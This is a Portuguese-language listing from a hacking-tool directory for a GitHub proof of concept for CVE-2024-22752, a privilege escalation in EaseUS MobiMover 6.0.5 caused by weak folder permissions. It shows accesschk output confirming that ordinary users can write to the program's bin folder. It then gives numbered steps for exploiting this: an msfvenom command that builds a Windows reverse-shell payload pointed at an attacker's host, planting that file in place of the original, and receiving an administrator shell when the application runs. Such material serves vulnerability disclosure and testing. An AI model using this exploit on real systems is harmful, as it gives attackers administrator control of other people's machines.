Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - Permissões Inseguras de Arquivos e Pastas | Kitploit
Ferramentas/GitHubGitHub/hacker625/cve-2024-22752
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoConfiguração IncorretaExploração de Binários
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Permissões Inseguras de Arquivos e Pastas

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

EaseUS MobiMover 6.0.5 Build 21620 - Permissões Inseguras de Arquivos e Pastas

MobiMoverUILaunch.exe sofre de uma vulnerabilidade de elevação de privilégios que pode ser usada por um "Usuário Autenticado" para modificar o arquivo executável do serviço com um binário de sua escolha na pasta bin. A vulnerabilidade existe devido a um conjunto fraco de permissões concedidas ao "Grupo de Usuários Autenticados", que concede o sinalizador (M), também conhecido como "Privilégio de Modificação".

alt text

Página do fornecedor: https://www.easeus.com/
Link do software : https://down.easeus.com/product/mobimover_trial_setup
Google Drive: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vídeo POC: https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Crie um arquivo binário malicioso no Kali Linux com msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. Transfira o 'prepare.exe' criado para o host Windows a partir do Kali com acesso de usuário de baixo nível

  3. Mova o arquivo binário 'prepare.exe' criado para 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' para substituir o antigo com acesso de usuário de baixo nível

  4. Quando o Administrador executar o aplicativo, você obterá um shell reverso como administrador

Baixar ferramenta